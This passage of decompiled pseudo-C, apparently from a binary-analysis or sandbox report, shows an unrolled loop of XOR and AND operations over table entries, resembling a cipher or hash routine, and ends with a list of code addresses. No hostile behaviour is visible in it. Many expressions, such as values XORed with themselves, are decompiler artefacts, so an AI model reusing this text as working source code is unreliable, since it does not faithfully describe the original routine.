                                                                                  						 *(_t2149 - 4) =  *(_t1800 + _t1624 * 8 - 0x64) &  *(_t2073 + _t1452 * 8 - 0x7c) ^  *(_t2149 - 4);
                                                                                  						_t1801 =  *(_t2149 - 0xc);
                                                                                  						_t1453 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1628 =  *(_t2149 - 0xc);
                                                                                  						_t2074 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1453 + _t1801 * 8 - 0xd0) &  *(_t2074 + _t1628 * 8 - 0x1f0) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1453 + _t1801 * 8 - 0xcc) &  *(_t2074 + _t1628 * 8 - 0x1ec) ^  *(_t2149 - 4);
                                                                                  						L0040F198();
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						L0040F19E();
                                                                                  						_t1631 =  *(_t2149 - 0xc);
                                                                                  						_t2075 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2075 + 0x28 + _t1631 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2075 + 0x2c + _t1631 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                  						_t1632 =  *(_t2149 - 0xc);
                                                                                  						_t1810 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1810 + _t1632 * 8 - 0x298);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1810 + _t1632 * 8 - 0x294);
                                                                                  						_t1633 =  *(_t2149 - 0xc);
                                                                                  						_t1811 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1811 + _t1633 * 8 - 0x58);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1811 + _t1633 * 8 - 0x54);
                                                                                  						_t1634 =  *(_t2149 - 0xc);
                                                                                  						_t1812 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1463 =  *(_t2149 - 0xc);
                                                                                  						_t2080 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1812 + _t1634 * 8 - 0x60) &  *(_t2080 + _t1463 * 8 - 0x78) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1812 + _t1634 * 8 - 0x5c) &  *(_t2080 + _t1463 * 8 - 0x74) ^  *(_t2149 - 4);
                                                                                  						_t1813 =  *(_t2149 - 0xc);
                                                                                  						_t1464 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1638 =  *(_t2149 - 0xc);
                                                                                  						_t2081 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1464 + _t1813 * 8 - 0xc8) &  *(_t2081 + _t1638 * 8 - 0x1e8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1464 + _t1813 * 8 - 0xc4) &  *(_t2081 + _t1638 * 8 - 0x1e4) ^  *(_t2149 - 4);
                                                                                  						L0040F198();
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						L0040F19E();
                                                                                  						_t1641 =  *(_t2149 - 0xc);
                                                                                  						_t2082 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2082 + 0x30 + _t1641 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2082 + 0x34 + _t1641 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                  						_t1642 =  *(_t2149 - 0xc);
                                                                                  						_t1822 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1822 + _t1642 * 8 - 0x290);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1822 + _t1642 * 8 - 0x28c);
                                                                                  						_t1643 =  *(_t2149 - 0xc);
                                                                                  						_t1823 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1823 + _t1643 * 8 - 0x50);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1823 + _t1643 * 8 - 0x4c);
                                                                                  						_t1644 =  *(_t2149 - 0xc);
                                                                                  						_t1824 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1474 =  *(_t2149 - 0xc);
                                                                                  						_t2087 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1824 + _t1644 * 8 - 0x58) &  *(_t2087 + _t1474 * 8 - 0x70) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1824 + _t1644 * 8 - 0x54) &  *(_t2087 + _t1474 * 8 - 0x6c) ^  *(_t2149 - 4);
                                                                                  						_t1825 =  *(_t2149 - 0xc);
                                                                                  						_t1475 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1648 =  *(_t2149 - 0xc);
                                                                                  						_t2088 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1475 + _t1825 * 8 - 0xc0) &  *(_t2088 + _t1648 * 8 - 0x1e0) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1475 + _t1825 * 8 - 0xbc) &  *(_t2088 + _t1648 * 8 - 0x1dc) ^  *(_t2149 - 4);
                                                                                  						L0040F198();
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						L0040F19E();
                                                                                  						_t1651 =  *(_t2149 - 0xc);
                                                                                  						_t2089 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2089 + 0x38 + _t1651 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2089 + 0x3c + _t1651 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                  						_t1652 =  *(_t2149 - 0xc);
                                                                                  						_t1834 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1834 + _t1652 * 8 - 0x288);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1834 + _t1652 * 8 - 0x284);
                                                                                  						_t1653 =  *(_t2149 - 0xc);
                                                                                  						_t1835 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1835 + _t1653 * 8 - 0x48);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1835 + _t1653 * 8 - 0x44);
                                                                                  						_t1654 =  *(_t2149 - 0xc);
                                                                                  						_t1836 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1485 =  *(_t2149 - 0xc);
                                                                                  						_t2094 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1836 + _t1654 * 8 - 0x50) &  *(_t2094 + _t1485 * 8 - 0x68) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1836 + _t1654 * 8 - 0x4c) &  *(_t2094 + _t1485 * 8 - 0x64) ^  *(_t2149 - 4);
                                                                                  						_t1837 =  *(_t2149 - 0xc);
                                                                                  						_t1486 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1658 =  *(_t2149 - 0xc);
                                                                                  						_t2095 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1486 + _t1837 * 8 - 0xb8) &  *(_t2095 + _t1658 * 8 - 0x1d8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1486 + _t1837 * 8 - 0xb4) &  *(_t2095 + _t1658 * 8 - 0x1d4) ^  *(_t2149 - 4);
                                                                                  						L0040F198();
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						L0040F19E();
                                                                                  						_t1661 =  *(_t2149 - 0xc);
                                                                                  						_t2096 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2096 + 0x40 + _t1661 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2096 + 0x44 + _t1661 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                  						_t1662 =  *(_t2149 - 0xc);
                                                                                  						_t1846 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1846 + _t1662 * 8 - 0x280);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1846 + _t1662 * 8 - 0x27c);
                                                                                  						_t1663 =  *(_t2149 - 0xc);
                                                                                  						_t1847 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1847 + _t1663 * 8 - 0x40);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1847 + _t1663 * 8 - 0x3c);
                                                                                  						_t1664 =  *(_t2149 - 0xc);
                                                                                  						_t1848 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1496 =  *(_t2149 - 0xc);
                                                                                  						_t2101 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1848 + _t1664 * 8 - 0x48) &  *(_t2101 + _t1496 * 8 - 0x60) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1848 + _t1664 * 8 - 0x44) &  *(_t2101 + _t1496 * 8 - 0x5c) ^  *(_t2149 - 4);
                                                                                  						_t1849 =  *(_t2149 - 0xc);
                                                                                  						_t1497 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1668 =  *(_t2149 - 0xc);
                                                                                  						_t2102 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1497 + _t1849 * 8 - 0xb0) &  *(_t2102 + _t1668 * 8 - 0x1d0) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1497 + _t1849 * 8 - 0xac) &  *(_t2102 + _t1668 * 8 - 0x1cc) ^  *(_t2149 - 4);
                                                                                  						L0040F198();
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						L0040F19E();
                                                                                  						_t1671 =  *(_t2149 - 0xc);
                                                                                  						_t2103 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2103 + 0x48 + _t1671 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2103 + 0x4c + _t1671 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                  						_t1672 =  *(_t2149 - 0xc);
                                                                                  						_t1858 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1858 + _t1672 * 8 - 0x278);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1858 + _t1672 * 8 - 0x274);
                                                                                  						_t1673 =  *(_t2149 - 0xc);
                                                                                  						_t1859 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1859 + _t1673 * 8 - 0x38);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1859 + _t1673 * 8 - 0x34);
                                                                                  						_t1674 =  *(_t2149 - 0xc);
                                                                                  						_t1860 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1507 =  *(_t2149 - 0xc);
                                                                                  						_t2108 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1860 + _t1674 * 8 - 0x40) &  *(_t2108 + _t1507 * 8 - 0x58) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1860 + _t1674 * 8 - 0x3c) &  *(_t2108 + _t1507 * 8 - 0x54) ^  *(_t2149 - 4);
                                                                                  						_t1861 =  *(_t2149 - 0xc);
                                                                                  						_t1508 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1678 =  *(_t2149 - 0xc);
                                                                                  						_t2109 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1508 + _t1861 * 8 - 0xa8) &  *(_t2109 + _t1678 * 8 - 0x1c8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1508 + _t1861 * 8 - 0xa4) &  *(_t2109 + _t1678 * 8 - 0x1c4) ^  *(_t2149 - 4);
                                                                                  						L0040F198();
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						L0040F19E();
                                                                                  						_t1681 =  *(_t2149 - 0xc);
                                                                                  						_t2110 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2110 + 0x50 + _t1681 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2110 + 0x54 + _t1681 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                  						_t1682 =  *(_t2149 - 0xc);
                                                                                  						_t1870 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1870 + _t1682 * 8 - 0x270);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1870 + _t1682 * 8 - 0x26c);
                                                                                  						_t1683 =  *(_t2149 - 0xc);
                                                                                  						_t1871 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1871 + _t1683 * 8 - 0x30);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1871 + _t1683 * 8 - 0x2c);
                                                                                  						_t1684 =  *(_t2149 - 0xc);
                                                                                  						_t1872 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1518 =  *(_t2149 - 0xc);
                                                                                  						_t2115 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1872 + _t1684 * 8 - 0x38) &  *(_t2115 + _t1518 * 8 - 0x50) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1872 + _t1684 * 8 - 0x34) &  *(_t2115 + _t1518 * 8 - 0x4c) ^  *(_t2149 - 4);
                                                                                  						_t1873 =  *(_t2149 - 0xc);
                                                                                  						_t1519 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1688 =  *(_t2149 - 0xc);
                                                                                  						_t2116 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1519 + _t1873 * 8 - 0xa0) &  *(_t2116 + _t1688 * 8 - 0x1c0) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1519 + _t1873 * 8 - 0x9c) &  *(_t2116 + _t1688 * 8 - 0x1bc) ^  *(_t2149 - 4);
                                                                                  						L0040F198();
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						L0040F19E();
                                                                                  						_t1691 =  *(_t2149 - 0xc);
                                                                                  						_t2117 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2117 + 0x58 + _t1691 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2117 + 0x5c + _t1691 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                  						_t1692 =  *(_t2149 - 0xc);
                                                                                  						_t1882 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1882 + _t1692 * 8 - 0x268);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1882 + _t1692 * 8 - 0x264);
                                                                                  						_t1693 =  *(_t2149 - 0xc);
                                                                                  						_t1883 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1883 + _t1693 * 8 - 0x28);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1883 + _t1693 * 8 - 0x24);
                                                                                  						_t1694 =  *(_t2149 - 0xc);
                                                                                  						_t1884 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1529 =  *(_t2149 - 0xc);
                                                                                  						_t2122 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1884 + _t1694 * 8 - 0x30) &  *(_t2122 + _t1529 * 8 - 0x48) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1884 + _t1694 * 8 - 0x2c) &  *(_t2122 + _t1529 * 8 - 0x44) ^  *(_t2149 - 4);
                                                                                  						_t1885 =  *(_t2149 - 0xc);
                                                                                  						_t1530 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1698 =  *(_t2149 - 0xc);
                                                                                  						_t2123 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1530 + _t1885 * 8 - 0x98) &  *(_t2123 + _t1698 * 8 - 0x1b8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1530 + _t1885 * 8 - 0x94) &  *(_t2123 + _t1698 * 8 - 0x1b4) ^  *(_t2149 - 4);
                                                                                  						L0040F198();
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						L0040F19E();
                                                                                  						_t1701 =  *(_t2149 - 0xc);
                                                                                  						_t2124 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2124 + 0x60 + _t1701 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2124 + 0x64 + _t1701 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                  						_t1702 =  *(_t2149 - 0xc);
                                                                                  						_t1894 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1894 + _t1702 * 8 - 0x260);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1894 + _t1702 * 8 - 0x25c);
                                                                                  						_t1703 =  *(_t2149 - 0xc);
                                                                                  						_t1895 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1895 + _t1703 * 8 - 0x20);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1895 + _t1703 * 8 - 0x1c);
                                                                                  						_t1704 =  *(_t2149 - 0xc);
                                                                                  						_t1896 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1540 =  *(_t2149 - 0xc);
                                                                                  						_t2129 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1896 + _t1704 * 8 - 0x28) &  *(_t2129 + _t1540 * 8 - 0x40) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1896 + _t1704 * 8 - 0x24) &  *(_t2129 + _t1540 * 8 - 0x3c) ^  *(_t2149 - 4);
                                                                                  						_t1897 =  *(_t2149 - 0xc);
                                                                                  						_t1541 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1708 =  *(_t2149 - 0xc);
                                                                                  						_t2130 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1541 + _t1897 * 8 - 0x90) &  *(_t2130 + _t1708 * 8 - 0x1b0) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1541 + _t1897 * 8 - 0x8c) &  *(_t2130 + _t1708 * 8 - 0x1ac) ^  *(_t2149 - 4);
                                                                                  						L0040F198();
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						L0040F19E();
                                                                                  						_t1711 =  *(_t2149 - 0xc);
                                                                                  						_t2131 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2131 + 0x68 + _t1711 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2131 + 0x6c + _t1711 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                  						_t1712 =  *(_t2149 - 0xc);
                                                                                  						_t1906 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1906 + _t1712 * 8 - 0x258);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1906 + _t1712 * 8 - 0x254);
                                                                                  						_t1713 =  *(_t2149 - 0xc);
                                                                                  						_t1907 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1907 + _t1713 * 8 - 0x18);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1907 + _t1713 * 8 - 0x14);
                                                                                  						_t1714 =  *(_t2149 - 0xc);
                                                                                  						_t1908 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1551 =  *(_t2149 - 0xc);
                                                                                  						_t2136 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1908 + _t1714 * 8 - 0x20) &  *(_t2136 + _t1551 * 8 - 0x38) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1908 + _t1714 * 8 - 0x1c) &  *(_t2136 + _t1551 * 8 - 0x34) ^  *(_t2149 - 4);
                                                                                  						_t1909 =  *(_t2149 - 0xc);
                                                                                  						_t1552 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1718 =  *(_t2149 - 0xc);
                                                                                  						_t2137 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1552 + _t1909 * 8 - 0x88) &  *(_t2137 + _t1718 * 8 - 0x1a8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1552 + _t1909 * 8 - 0x84) &  *(_t2137 + _t1718 * 8 - 0x1a4) ^  *(_t2149 - 4);
                                                                                  						L0040F198();
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						L0040F19E();
                                                                                  						_t1721 =  *(_t2149 - 0xc);
                                                                                  						_t2138 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2138 + 0x70 + _t1721 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2138 + 0x74 + _t1721 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                  						_t1722 =  *(_t2149 - 0xc);
                                                                                  						_t1918 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1918 + _t1722 * 8 - 0x250);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1918 + _t1722 * 8 - 0x24c);
                                                                                  						_t1723 =  *(_t2149 - 0xc);
                                                                                  						_t1919 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1919 + _t1723 * 8 - 0x10);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1919 + _t1723 * 8 - 0xc);
                                                                                  						_t1724 =  *(_t2149 - 0xc);
                                                                                  						_t1920 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1562 =  *(_t2149 - 0xc);
                                                                                  						_t2143 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1920 + _t1724 * 8 - 0x18) &  *(_t2143 + _t1562 * 8 - 0x30) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1920 + _t1724 * 8 - 0x14) &  *(_t2143 + _t1562 * 8 - 0x2c) ^  *(_t2149 - 4);
                                                                                  						_t1921 =  *(_t2149 - 0xc);
                                                                                  						_t1563 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1728 =  *(_t2149 - 0xc);
                                                                                  						_t2144 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1563 + _t1921 * 8 - 0x80) &  *(_t2144 + _t1728 * 8 - 0x1a0) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1563 + _t1921 * 8 - 0x7c) &  *(_t2144 + _t1728 * 8 - 0x19c) ^  *(_t2149 - 4);
                                                                                  						L0040F198();
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						L0040F19E();
                                                                                  						_t1731 =  *(_t2149 - 0xc);
                                                                                  						_t2145 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2145 + 0x78 + _t1731 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2145 + 0x7c + _t1731 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						L0040F19E();
                                                                                  						L0040F198();
                                                                                  						_t1391 =  *(_t2149 - 0x14) &  *0x411134;
                                                                                  						 *(_t2149 - 0x18) =  *(_t2149 - 0x18) ^  *(_t2149 - 0x18) ^  *(_t2149 - 0x18) &  *0x411130;
                                                                                  						 *(_t2149 - 0x14) =  *(_t2149 - 0x14) ^  *(_t2149 - 0x14) ^  *(_t2149 - 0x14) &  *0x411134;
                                                                                  						 *(_t2149 - 0xc) =  *(_t2149 - 0xc) + 0x10;
                                                                                  						continue;
                                                                                  					}
                                                                                  					L3:
                                                                                  					return _t1391;
                                                                                  					L4:
                                                                                  				}
                                                                                  			}




































































































































































































































                                                                                  0x00406979
                                                                                  0x00406979
                                                                                  0x00406979
                                                                                  0x0040697f
                                                                                  0x00406982
                                                                                  0x00406985
                                                                                  0x0040698b
                                                                                  0x00406991
                                                                                  0x00406994
                                                                                  0x0040699a
                                                                                  0x0040699d
                                                                                  0x004069a0
                                                                                  0x004069b7
                                                                                  0x004069ba
                                                                                  0x004069bd
                                                                                  0x004069c0
                                                                                  0x004069d7
                                                                                  0x004069da
                                                                                  0x004069dd
                                                                                  0x004069e0
                                                                                  0x004069e3
                                                                                  0x004069e6
                                                                                  0x00406a0b
                                                                                  0x00406a0e
                                                                                  0x00406a11
                                                                                  0x00406a14
                                                                                  0x00406a17
                                                                                  0x00406a1a
                                                                                  0x00406a3f
                                                                                  0x00406a42
                                                                                  0x00406a4d
                                                                                  0x00406a58
                                                                                  0x00406a5b
                                                                                  0x00406a66
                                                                                  0x00406a71
                                                                                  0x00406a74
                                                                                  0x00406a77
                                                                                  0x00406a7a
                                                                                  0x00406a81
                                                                                  0x00406a87
                                                                                  0x00406a8a
                                                                                  0x00406a8d
                                                                                  0x00406aa4
                                                                                  0x00406aa7
                                                                                  0x00406aaa
                                                                                  0x00406aad
                                                                                  0x00406abe
                                                                                  0x00406ac1
                                                                                  0x00406ac4
                                                                                  0x00406ac7
